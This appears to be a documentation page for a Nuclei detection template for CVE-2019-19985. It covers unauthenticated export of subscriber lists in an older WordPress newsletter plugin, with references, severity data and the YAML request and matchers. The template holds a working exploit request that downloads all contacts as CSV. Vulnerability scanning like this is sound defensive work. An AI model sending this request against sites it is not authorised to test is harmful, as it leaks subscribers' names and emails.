WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval
ID: CVE-2019-19985
Severity: medium
Author: KBA@SOGETI_ESEC,madrobot,dwisiswant0
Tags: cve,cve2019,wordpress,wp-plugin,edb,packetstorm,icegram
Description
Section titled “Description”WordPress Email Subscribers & Newsletters plugin before 4.2.3 is susceptible to arbitrary file retrieval via a flaw that allows unauthenticated file download and user information disclosure. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
YAML Source
Section titled “YAML Source”id: CVE-2019-19985
info: name: WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval author: KBA@SOGETI_ESEC,madrobot,dwisiswant0 severity: medium description: WordPress Email Subscribers & Newsletters plugin before 4.2.3 is susceptible to arbitrary file retrieval via a flaw that allows unauthenticated file download and user information disclosure. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations. impact: | An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage. remediation: | Update to the latest version of WordPress Email Subscribers & Newsletters plugin (4.2.3) or apply the patch provided by the vendor. reference: - https://www.exploit-db.com/exploits/48698 - https://wpvulndb.com/vulnerabilities/9946 - https://www.wordfence.com/blog/2019/11/multiple-vulnerabilities-patched-in-email-subscribers-newsletters-plugin/ - http://packetstormsecurity.com/files/158563/WordPress-Email-Subscribers-And-Newsletters-4.2.2-File-Disclosure.html - https://nvd.nist.gov/vuln/detail/CVE-2019-19985 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2019-19985 cwe-id: CWE-862 epss-score: 0.16771 epss-percentile: 0.95569 cpe: cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: icegram product: email_subscribers_\&_newsletters framework: wordpress tags: cve,cve2019,wordpress,wp-plugin,edb,packetstorm,icegram
http: - method: GET path: - "{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"
matchers-condition: and matchers: - type: word part: body words: - Name - Email - Status - Created On condition: and
- type: word part: header words: - "Content-Disposition: attachment; filename=all-contacts.csv;"
- type: status status: - 200# digest: 4b0a00483046022100abe32b3710abaf2dff84c0a2ff6dd8732a5a26e97e3ab6596a662786d6160764022100ca71cc6199daf3baa6e02c9f96d06e88c7c8996833b21836466fa8dc605f2499:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-19985.yaml"